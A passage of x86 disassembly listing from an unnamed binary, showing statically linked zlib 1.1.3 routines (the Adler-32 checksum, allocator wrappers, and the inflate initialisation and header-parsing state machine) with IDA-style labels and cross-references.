mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov edx, [ebp+var_8]
add edx, [ebp+var_4]
mov [ebp+var_8], edx
mov eax, [ebp+arg_4]
xor ecx, ecx
mov cl, [eax+0Dh]
mov edx, [ebp+var_4]
add edx, ecx
mov [ebp+var_4], edx
mov eax, [ebp+var_8]
add eax, [ebp+var_4]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx+0Eh]
mov eax, [ebp+var_4]
add eax, edx
mov [ebp+var_4], eax
mov ecx, [ebp+var_8]
add ecx, [ebp+var_4]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_4]
xor eax, eax
mov al, [edx+0Fh]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov edx, [ebp+var_8]
add edx, [ebp+var_4]
mov [ebp+var_8], edx
mov eax, [ebp+arg_4]
add eax, 10h
mov [ebp+arg_4], eax
mov ecx, [ebp+var_C]
sub ecx, 10h
mov [ebp+var_C], ecx
jmp loc_40D771
; ---------------------------------------------------------------------------
loc_40D921: ; CODE XREF: sub_40D710+65�j
cmp [ebp+var_C], 0
jz short loc_40D957
loc_40D927: ; CODE XREF: sub_40D710+245�j
mov edx, [ebp+arg_4]
xor eax, eax
mov al, [edx]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov edx, [ebp+arg_4]
add edx, 1
mov [ebp+arg_4], edx
mov eax, [ebp+var_8]
add eax, [ebp+var_4]
mov [ebp+var_8], eax
mov ecx, [ebp+var_C]
sub ecx, 1
mov [ebp+var_C], ecx
cmp [ebp+var_C], 0
jnz short loc_40D927
loc_40D957: ; CODE XREF: sub_40D710+215�j
mov eax, [ebp+var_4]
xor edx, edx
mov ecx, 0FFF1h
div ecx
mov [ebp+var_4], edx
mov eax, [ebp+var_8]
xor edx, edx
mov ecx, 0FFF1h
div ecx
mov [ebp+var_8], edx
jmp loc_40D740
; ---------------------------------------------------------------------------
loc_40D97A: ; CODE XREF: sub_40D710+34�j
mov eax, [ebp+var_8]
shl eax, 10h
or eax, [ebp+var_4]
loc_40D983: ; CODE XREF: sub_40D710+2B�j
mov esp, ebp
pop ebp
retn
sub_40D710 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, offset a1_1_3 ; "1.1.3"
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 2
sub eax, [ebp+8]
mov eax, off_4132D0[eax*4]
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D9A5 proc near ; DATA XREF: sub_40DAB5+68�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0
jz short loc_40D9BC
mov eax, [ebp+arg_8]
sub eax, [ebp+arg_8]
mov ecx, [ebp+arg_4]
add ecx, eax
mov [ebp+arg_4], ecx
loc_40D9BC: ; CODE XREF: sub_40D9A5+7�j
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
call dword_413208 ; calloc
add esp, 8
pop ebp
retn
sub_40D9A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D9CF proc near ; DATA XREF: sub_40DAB5+85�o
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push eax
call dword_4131D4 ; free
add esp, 4
pop ebp
retn
sub_40D9CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D9E1 proc near ; CODE XREF: sub_40DAB5+172�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0
jz short loc_40D9F3
mov eax, [ebp+arg_0]
cmp dword ptr [eax+1Ch], 0
jnz short loc_40D9FA
loc_40D9F3: ; CODE XREF: sub_40D9E1+7�j
mov eax, 0FFFFFFFEh
jmp short loc_40DA4A
; ---------------------------------------------------------------------------
loc_40D9FA: ; CODE XREF: sub_40D9E1+10�j
mov ecx, [ebp+arg_0]
mov dword ptr [ecx+14h], 0
mov edx, [ebp+arg_0]
mov dword ptr [edx+8], 0
mov eax, [ebp+arg_0]
mov dword ptr [eax+18h], 0
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov eax, [edx+0Ch]
neg eax
sbb eax, eax
and eax, 7
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov [edx], eax
push 0
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov eax, [edx+14h]
push eax
call sub_40ADBE
add esp, 0Ch
xor eax, eax
loc_40DA4A: ; CODE XREF: sub_40D9E1+17�j
pop ebp
retn
sub_40D9E1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DA4C proc near ; CODE XREF: sub_40DAB5+FE�p
; sub_40DAB5+15F�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0
jz short loc_40DA67
mov eax, [ebp+arg_0]
cmp dword ptr [eax+1Ch], 0
jz short loc_40DA67
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+24h], 0
jnz short loc_40DA6E
loc_40DA67: ; CODE XREF: sub_40DA4C+7�j
; sub_40DA4C+10�j
mov eax, 0FFFFFFFEh
jmp short loc_40DAB3
; ---------------------------------------------------------------------------
loc_40DA6E: ; CODE XREF: sub_40DA4C+19�j
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
cmp dword ptr [eax+14h], 0
jz short loc_40DA90
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov ecx, [eax+14h]
push ecx
call sub_40C2D5
add esp, 8
loc_40DA90: ; CODE XREF: sub_40DA4C+2C�j
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
push eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+28h]
push edx
mov eax, [ebp+arg_0]
call dword ptr [eax+24h]
add esp, 8
mov ecx, [ebp+arg_0]
mov dword ptr [ecx+1Ch], 0
xor eax, eax
loc_40DAB3: ; CODE XREF: sub_40DA4C+20�j
pop ebp
retn
sub_40DA4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DAB5 proc near ; CODE XREF: sub_40F6B0+163�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_4], offset a1_1_3_0 ; "1.1.3"
mov [ebp+var_C], 38h
cmp [ebp+var_4], 0
jz short loc_40DAE6
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
movsx edx, ds:byte_4177F4
cmp ecx, edx
jnz short loc_40DAE6
cmp [ebp+var_C], 38h
jz short loc_40DAF0
loc_40DAE6: ; CODE XREF: sub_40DAB5+18�j
; sub_40DAB5+29�j
mov eax, 0FFFFFFFAh
jmp loc_40DC31
; ---------------------------------------------------------------------------
loc_40DAF0: ; CODE XREF: sub_40DAB5+2F�j
mov [ebp+var_8], 0FFFFFFF1h
cmp [ebp+arg_0], 0
jnz short loc_40DB07
mov eax, 0FFFFFFFEh
jmp loc_40DC31
; ---------------------------------------------------------------------------
loc_40DB07: ; CODE XREF: sub_40DAB5+46�j
mov eax, [ebp+arg_0]
mov dword ptr [eax+18h], 0
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+20h], 0
jnz short loc_40DB2E
mov edx, [ebp+arg_0]
mov dword ptr [edx+20h], offset sub_40D9A5
mov eax, [ebp+arg_0]
mov dword ptr [eax+28h], 0
loc_40DB2E: ; CODE XREF: sub_40DAB5+63�j
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+24h], 0
jnz short loc_40DB41
mov edx, [ebp+arg_0]
mov dword ptr [edx+24h], offset sub_40D9CF
loc_40DB41: ; CODE XREF: sub_40DAB5+80�j
push 18h
push 1
mov eax, [ebp+arg_0]
mov ecx, [eax+28h]
push ecx
mov edx, [ebp+arg_0]
call dword ptr [edx+20h]
add esp, 0Ch
mov ecx, [ebp+arg_0]
mov [ecx+1Ch], eax
mov edx, [ebp+arg_0]
cmp dword ptr [edx+1Ch], 0
jnz short loc_40DB6E
mov eax, 0FFFFFFFCh
jmp loc_40DC31
; ---------------------------------------------------------------------------
loc_40DB6E: ; CODE XREF: sub_40DAB5+AD�j
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov dword ptr [ecx+14h], 0
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov dword ptr [eax+0Ch], 0
cmp [ebp+var_8], 0
jge short loc_40DBA3
mov ecx, [ebp+var_8]
neg ecx
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov dword ptr [eax+0Ch], 1
loc_40DBA3: ; CODE XREF: sub_40DAB5+D7�j
cmp [ebp+var_8], 8
jl short loc_40DBAF
cmp [ebp+var_8], 0Fh
jle short loc_40DBC2
loc_40DBAF: ; CODE XREF: sub_40DAB5+F2�j
mov ecx, [ebp+arg_0]
push ecx
call sub_40DA4C
add esp, 4
mov eax, 0FFFFFFFEh
jmp short loc_40DC31
; ---------------------------------------------------------------------------
loc_40DBC2: ; CODE XREF: sub_40DAB5+F8�j
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov ecx, [ebp+var_8]
mov [eax+10h], ecx
mov edx, 1
mov ecx, [ebp+var_8]
shl edx, cl
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov edx, [ecx+0Ch]
neg edx
sbb edx, edx
not edx
and edx, offset sub_40D710
push edx
mov eax, [ebp+arg_0]
push eax
call sub_40AE75
add esp, 0Ch
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov [edx+14h], eax
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
cmp dword ptr [ecx+14h], 0
jnz short loc_40DC23
mov edx, [ebp+arg_0]
push edx
call sub_40DA4C
add esp, 4
mov eax, 0FFFFFFFCh
jmp short loc_40DC31
; ---------------------------------------------------------------------------
loc_40DC23: ; CODE XREF: sub_40DAB5+159�j
mov eax, [ebp+arg_0]
push eax
call sub_40D9E1
add esp, 4
xor eax, eax
loc_40DC31: ; CODE XREF: sub_40DAB5+36�j
; sub_40DAB5+4D�j ...
mov esp, ebp
pop ebp
retn
sub_40DAB5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DC35 proc near ; CODE XREF: sub_40F872+26E�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_0], 0
jz short loc_40DC52
mov eax, [ebp+arg_0]
cmp dword ptr [eax+1Ch], 0
jz short loc_40DC52
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx], 0
jnz short loc_40DC5C
loc_40DC52: ; CODE XREF: sub_40DC35+A�j
; sub_40DC35+13�j
mov eax, 0FFFFFFFEh
jmp loc_40E2BD
; ---------------------------------------------------------------------------
loc_40DC5C: ; CODE XREF: sub_40DC35+1B�j
xor edx, edx
cmp [ebp+arg_4], 4
setnz dl
dec edx
and edx, 0FFFFFFFBh
mov [ebp+arg_4], edx
mov [ebp+var_8], 0FFFFFFFBh
loc_40DC73: ; CODE XREF: sub_40DC35:loc_40E2B8�j
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov edx, [ecx]
mov [ebp+var_C], edx
cmp [ebp+var_C], 0Dh
ja loc_40E2B1
mov eax, [ebp+var_C]
jmp off_40E2C1[eax*4]
loc_40DC92: ; DATA XREF: HSho:off_40E2C1�o
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+4], 0
jnz short loc_40DCA3
mov eax, [ebp+var_8]
jmp loc_40E2BD
; ---------------------------------------------------------------------------
loc_40DCA3: ; CODE XREF: sub_40DC35+64�j
mov edx, [ebp+arg_4]
mov [ebp+var_8], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
sub ecx, 1
mov edx, [ebp+arg_0]
mov [edx+4], ecx
mov eax, [ebp+arg_0]
mov ecx, [eax+8]
add ecx, 1
mov edx, [ebp+arg_0]
mov [edx+8], ecx
mov eax, [ebp+arg_0]
mov ecx, [eax]
xor edx, edx
mov dl, [ecx]
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov [ecx+4], edx
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov ecx, [eax+4]
and ecx, 0Fh
mov edx, [ebp+arg_0]
mov eax, [edx]
add eax, 1
mov edx, [ebp+arg_0]
mov [edx], eax
cmp ecx, 8
jz short loc_40DD1F
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov dword ptr [ecx], 0Dh
mov edx, [ebp+arg_0]
mov dword ptr [edx+18h], offset aUnknownCompres ; "unknown compression method"
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov dword ptr [ecx+4], 5
jmp loc_40E2B8
; ---------------------------------------------------------------------------
loc_40DD1F: ; CODE XREF: sub_40DC35+C0�j
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov ecx, [eax+4]
shr ecx, 4
add ecx, 8
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
cmp ecx, [eax+10h]
jbe short loc_40DD61
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov dword ptr [edx], 0Dh
mov eax, [ebp+arg_0]
mov dword ptr [eax+18h], offset aInvalidWindowS ; "invalid window size"
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov dword ptr [edx+4], 5
jmp loc_40E2B8
; ---------------------------------------------------------------------------
loc_40DD61: ; CODE XREF: sub_40DC35+102�j
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov dword ptr [ecx], 1
loc_40DD6D: ; CODE XREF: sub_40DC35+56�j
; DATA XREF: HSho:0040E2C5�o
mov edx, [ebp+arg_0]
cmp dword ptr [edx+4], 0
jnz short loc_40DD7E
mov eax, [ebp+var_8]
jmp loc_40E2BD
; ---------------------------------------------------------------------------
loc_40DD7E: ; CODE XREF: sub_40DC35+13F�j
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
sub edx, 1
mov eax, [ebp+arg_0]
mov [eax+4], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
add edx, 1
mov eax, [ebp+arg_0]
mov [eax+8], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx]
xor eax, eax
mov al, [edx]
mov [ebp+var_4], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_0]
mov [eax], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov eax, [edx+4]
shl eax, 8
add eax, [ebp+var_4]
xor edx, edx
mov ecx, 1Fh
div ecx
test edx, edx
jz short loc_40DDFF
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov dword ptr [eax], 0Dh
mov ecx, [ebp+arg_0]
mov dword ptr [ecx+18h], offset aIncorrectHeade ; "incorrect header check"
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov dword ptr [eax+4], 5
jmp loc_40E2B8
; ---------------------------------------------------------------------------
loc_40DDFF: ; CODE XREF: sub_40DC35+1A0�j
mov ecx, [ebp+var_4]
and ecx, 20h
test ecx, ecx
jnz short loc_40DE1A
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov dword ptr [eax], 7
jmp loc_40E2B8
; ---------------------------------------------------------------------------
loc_40DE1A: ; CODE XREF: sub_40DC35+1D2�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov dword ptr [edx], 2
loc_40DE26: ; CODE XREF: sub_40DC35+56�j
; DATA XREF: HSho:0040E2C9�o
mov eax, [ebp+arg_0]
cmp dword ptr [eax+4], 0
jnz short loc_40DE37
mov eax, [ebp+var_8]
jmp loc_40E2BD
; ---------------------------------------------------------------------------
loc_40DE37: ; CODE XREF: sub_40DC35+1F8�j
mov ecx, [ebp+arg_4]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+4]
sub eax, 1
mov ecx, [ebp+arg_0]
mov [ecx+4], eax
mov edx, [ebp+arg_0]
mov eax, [edx+8]
add eax, 1
mov ecx, [ebp+arg_0]
mov [ecx+8], eax
mov edx, [ebp+arg_0]
mov eax, [edx]
xor ecx, ecx
mov cl, [eax]
shl ecx, 18h
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov [eax+8], ecx
mov ecx, [ebp+arg_0]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_0]
mov [eax], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov dword ptr [edx], 3
loc_40DE89: ; CODE XREF: sub_40DC35+56�j
; DATA XREF: HSho:0040E2CD�o
mov eax, [ebp+arg_0]
cmp dword ptr [eax+4], 0
jnz short loc_40DE9A
mov eax, [ebp+var_8]
jmp loc_40E2BD
; ---------------------------------------------------------------------------
loc_40DE9A: ; CODE XREF: sub_40DC35+25B�j
mov ecx, [ebp+arg_4]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+4]
sub eax, 1
mov ecx, [ebp+arg_0]
mov [ecx+4], eax
mov edx, [ebp+arg_0]
mov eax, [edx+8]
add eax, 1
mov ecx, [ebp+arg_0]
mov [ecx+8], eax
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov ecx, [ebp+arg_0]
mov edx, [ecx]
xor ecx, ecx
mov cl, [edx]
shl ecx, 10h
mov edx, [eax+8]
add edx, ecx
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov [ecx+8], edx
mov edx, [ebp+arg_0]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+arg_0]
mov [ecx], eax
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov dword ptr [eax], 4
loc_40DEF7: ; CODE XREF: sub_40DC35+56�j
; DATA XREF: HSho:0040E2D1�o
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+4], 0
jnz short loc_40DF08
mov eax, [ebp+var_8]
jmp loc_40E2BD
; ---------------------------------------------------------------------------
loc_40DF08: ; CODE XREF: sub_40DC35+2C9�j
mov edx, [ebp+arg_4]
mov [ebp+var_8], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
sub ecx, 1
mov edx, [ebp+arg_0]
mov [edx+4], ecx
mov eax, [ebp+arg_0]
mov ecx, [eax+8]
add ecx, 1
mov edx, [ebp+arg_0]
mov [edx+8], ecx
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov edx, [ebp+arg_0]
mov eax, [edx]
xor edx, edx
mov dl, [eax]
shl edx, 8
mov eax, [ecx+8]
add eax, edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov [edx+8], eax
mov eax, [ebp+arg_0]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_0]
mov [edx], ecx
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov dword ptr [ecx], 5
loc_40DF65: ; CODE XREF: sub_40DC35+56�j
; DATA XREF: HSho:0040E2D5�o
mov edx, [ebp+arg_0]
cmp dword ptr [edx+4], 0
jnz short loc_40DF76
mov eax, [ebp+var_8]
jmp loc_40E2BD
; ---------------------------------------------------------------------------
loc_40DF76: ; CODE XREF: sub_40DC35+337�j
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
sub edx, 1
mov eax, [ebp+arg_0]
mov [eax+4], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
add edx, 1
mov eax, [ebp+arg_0]
mov [eax+8], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov eax, [ebp+arg_0]
mov ecx, [eax]
xor eax, eax
mov al, [ecx]
mov ecx, [edx+8]
add ecx, eax
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov [eax+8], ecx
mov ecx, [ebp+arg_0]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_0]
mov [eax], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov eax, [ebp+arg_0]
mov ecx, [edx+8]
mov [eax+30h], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov dword ptr [eax], 6
mov eax, 2
jmp loc_40E2BD
; ---------------------------------------------------------------------------
loc_40DFE9: ; CODE XREF: sub_40DC35+56�j
; DATA XREF: HSho:0040E2D9�o
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov dword ptr [edx], 0Dh
mov eax, [ebp+arg_0]
mov dword ptr [eax+18h], offset aNeedDictionary ; "need dictionary"
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov dword ptr [edx+4], 0
mov eax, 0FFFFFFFEh
jmp loc_40E2BD
; ---------------------------------------------------------------------------
loc_40E016: ; CODE XREF: sub_40DC35+56�j
; DATA XREF: HSho:0040E2DD�o
mov eax, [ebp+var_8]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov ecx, [eax+14h]
push ecx
call sub_40AF6D
add esp, 0Ch
mov [ebp+var_8], eax
cmp [ebp+var_8], 0FFFFFFFDh
jnz short loc_40E057
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov dword ptr [eax], 0Dh
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov dword ptr [edx+4], 0
jmp loc_40E2B8
; ---------------------------------------------------------------------------
loc_40E057: ; CODE XREF: sub_40DC35+402�j
cmp [ebp+var_8], 0
jnz short loc_40E063
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
loc_40E063: ; CODE XREF: sub_40DC35+426�j
cmp [ebp+var_8], 1
jz short loc_40E071
mov eax, [ebp+var_8]
jmp loc_40E2BD
; ---------------------------------------------------------------------------
loc_40E071: ; CODE XREF: sub_40DC35+432�j
mov ecx, [ebp+arg_4]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
add eax, 4
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov ecx, [eax+14h]
push ecx
call sub_40ADBE
add esp, 0Ch
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
cmp dword ptr [eax+0Ch], 0
jz short loc_40E0B4
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov dword ptr [edx], 0Ch
jmp loc_40E2B8
; ---------------------------------------------------------------------------
loc_40E0B4: ; CODE XREF: sub_40DC35+46C�j
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov dword ptr [ecx], 8
loc_40E0C0: ; CODE XREF: sub_40DC35+56�j
; DATA XREF: HSho:0040E2E1�o
mov edx, [ebp+arg_0]
cmp dword ptr [edx+4], 0
jnz short loc_40E0D1
mov eax, [ebp+var_8]
jmp loc_40E2BD
; ---------------------------------------------------------------------------
loc_40E0D1: ; CODE XREF: sub_40DC35+492�j
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
sub edx, 1
mov eax, [ebp+arg_0]
mov [eax+4], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
add edx, 1
mov eax, [ebp+arg_0]
mov [eax+8], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx]
xor eax, eax
mov al, [edx]
shl eax, 18h
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov [edx+8], eax
mov eax, [ebp+arg_0]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_0]
mov [edx], ecx
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov dword ptr [ecx], 9
loc_40E123: ; CODE XREF: sub_40DC35+56�j
; DATA XREF: HSho:0040E2E5�o
mov edx, [ebp+arg_0]
cmp dword ptr [edx+4], 0
jnz short loc_40E134
mov eax, [ebp+var_8]
jmp loc_40E2BD
; ---------------------------------------------------------------------------
loc_40E134: ; CODE XREF: sub_40DC35+4F5�j
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
sub edx, 1
mov eax, [ebp+arg_0]
mov [eax+4], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
add edx, 1
mov eax, [ebp+arg_0]
mov [eax+8], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov eax, [ebp+arg_0]
mov ecx, [eax]
xor eax, eax
mov al, [ecx]
shl eax, 10h
mov ecx, [edx+8]
add ecx, eax
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov [eax+8], ecx
mov ecx, [ebp+arg_0]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_0]
mov [eax], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov dword ptr [edx], 0Ah
loc_40E191: ; CODE XREF: sub_40DC35+56�j
; DATA XREF: HSho:0040E2E9�o
mov eax, [ebp+arg_0]
cmp dword ptr [eax+4], 0
jnz short loc_40E1A2
mov eax, [ebp+var_8]
jmp loc_40E2BD
; ---------------------------------------------------------------------------
loc_40E1A2: ; CODE XREF: sub_40DC35+563�j
mov ecx, [ebp+arg_4]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+4]
sub eax, 1
mov ecx, [ebp+arg_0]
mov [ecx+4], eax
mov edx, [ebp+arg_0]
mov eax, [edx+8]
add eax, 1
mov ecx, [ebp+arg_0]
mov [ecx+8], eax
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov ecx, [ebp+arg_0]
mov edx, [ecx]
xor ecx, ecx
mov cl, [edx]
shl ecx, 8
mov edx, [eax+8]
add edx, ecx
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov [ecx+8], edx
mov edx, [ebp+arg_0]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+arg_0]
mov [ecx], eax
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov dword ptr [eax], 0Bh
loc_40E1FF: ; CODE XREF: sub_40DC35+56�j
; DATA XREF: HSho:0040E2ED�o
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+4], 0
jnz short loc_40E210
mov eax, [ebp+var_8]
jmp loc_40E2BD
; ---------------------------------------------------------------------------
loc_40E210: ; CODE XREF: sub_40DC35+5D1�j
mov edx, [ebp+arg_4]
mov [ebp+var_8], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
sub ecx, 1
mov edx, [ebp+arg_0]
mov [edx+4], ecx
mov eax, [ebp+arg_0]
mov ecx, [eax+8]
add ecx, 1
mov edx, [ebp+arg_0]
mov [edx+8], ecx
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov edx, [ebp+arg_0]
mov eax, [edx]
xor edx, edx
mov dl, [eax]
mov eax, [ecx+8]
add eax, edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov [edx+8], eax
mov eax, [ebp+arg_0]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_0]
mov [edx], ecx
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov ecx, [ecx+4]
cmp ecx, [eax+8]
jz short loc_40E297
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov dword ptr [eax], 0Dh
mov ecx, [ebp+arg_0]
mov dword ptr [ecx+18h], offset aIncorrectDataC ; "incorrect data check"
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov dword ptr [eax+4], 5
jmp short loc_40E2B8
; ---------------------------------------------------------------------------
loc_40E297: ; CODE XREF: sub_40DC35+63B�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
mov dword ptr [edx], 0Ch
loc_40E2A3: ; CODE XREF: sub_40DC35+56�j
; DATA XREF: HSho:0040E2F1�o
mov eax, 1
jmp short loc_40E2BD
; ---------------------------------------------------------------------------
loc_40E2AA: ; CODE XREF: sub_40DC35+56�j
; DATA XREF: HSho:0040E2F5�o
mov eax, 0FFFFFFFDh
jmp short loc_40E2BD
; ---------------------------------------------------------------------------
loc_40E2B1: ; CODE XREF: sub_40DC35+4D�j
mov eax, 0FFFFFFFEh
jmp short loc_40E2BD
; ---------------------------------------------------------------------------
loc_40E2B8: ; CODE XREF: sub_40DC35+E5�j
; sub_40DC35+127�j ...
jmp loc_40DC73
; ---------------------------------------------------------------------------
loc_40E2BD: ; CODE XREF: sub_40DC35+22�j
; sub_40DC35+69�j ...
mov esp, ebp
pop ebp
retn
sub_40DC35 endp
; ---------------------------------------------------------------------------
off_40E2C1 dd offset loc_40DC92 ; DATA XREF: sub_40DC35+56�r
dd offset loc_40DD6D
dd offset loc_40DE26
dd offset loc_40DE89
dd offset loc_40DEF7
dd offset loc_40DF65
dd offset loc_40DFE9
dd offset loc_40E016
dd offset loc_40E0C0
dd offset loc_40E123
dd offset loc_40E191
dd offset loc_40E1FF
dd offset loc_40E2A3
dd offset loc_40E2AA
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E2F9 proc near ; CODE XREF: sub_40FE9E+7F�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
